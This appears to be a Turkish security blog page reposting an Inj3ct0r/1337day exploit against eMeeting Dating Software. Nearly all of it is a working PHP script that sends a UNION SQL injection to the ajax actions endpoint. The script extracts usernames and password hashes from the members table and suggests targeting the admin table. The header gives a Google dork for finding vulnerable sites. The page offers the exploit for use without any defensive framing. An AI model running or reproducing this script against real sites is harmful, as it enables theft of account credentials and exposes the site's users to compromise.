eMeeting Dating Software SQL Injection Exploit açığı bulundu.
SQL injection’un oluşum yeri, açığın kullanımı ve açık hakkında açık bulucunun açıklamaları aşağıdaki şekilde bulunmaktadır.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm DaOne member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: eMeeting Dating Software SQL Injection Exploit
# Date: 2013-1-14
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database
# Software Link: http://datingscripts.co.uk/
# Category: webapps/php
# Price: $155
# Google dork: "Powered by eMeeting LLC"
# Tested on: version 9 & 10
##########################################
# Exploit:
<?php
echo"\n\n";
echo"------------------------------------------------------------------------\n";
echo"1 _ __ __ __ 1\n";
echo"1 /' \ __ /'__`\ /\ \__ /'__`\ 0\n";
echo"0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1\n";
echo"1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0\n";
echo"0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1\n";
echo"1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0\n";
echo"0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1\n";
echo"1 \ \____/ >> Exploit database separated by exploit 1\n";
echo"0 \/___/ type (local, remote, DoS, etc.) 1\n";
echo"------------------------------------------------------------------------\n";
echo"\n\n";
if($_SERVER['argv'][1] && $_SERVER['argv'][2]){
$host=$_SERVER['argv'][1];
$path=$_SERVER['argv'][2];
$spos=strpos($host, "http://");
if(!is_int($spos)&&($spos==0)){
$host="http://$host";
}
if(!$host=="http://localhost"){
$spos=strpos($host, "http://www.");
if (!is_int($spos)&&($spos==0)){
$host="http://www.$host";
}
}
$sql="inc/ajax/_actions.php?action=PopLinkedField&lid=1+union+select+concat(0x3e,username,'::',password)+from+members--"; # note: you can change table to "members_admin" if not found admin pass!
echo"exploiting...\n";
$source=file_get_contents($host.$path.$sql) or die('403 Forbidden..... Server has a Security');
$user=GetBetween($source,"this.value, >","::");
echo "username: $user\n";
$pass=GetBetween($source,"$user::",",>");
echo"hash: $pass\n";
}
else{
echo"\n\n";
echo"Usage: php ".$_SERVER['argv'][0]." [host] [path] \n";
echo"Example: php ".$_SERVER['argv'][0]." http://www.site.com /path/ \n";
echo"\n\n";
}
function GetBetween($content,$start,$end){
$r = explode($start, $content);
if (isset($r[1])){
$r = explode($end, $r[1]);
return $r[0];
}
return '';
}
?>
# greetz to: all Libyans hax0r5 
Bir önceki yazımız olan WordPress wp-codebox Plugin Full Path Disclosure vulnerability başlıklı makalemizde WordPress wp-codebox Açığı hakkında bilgiler verilmektedir.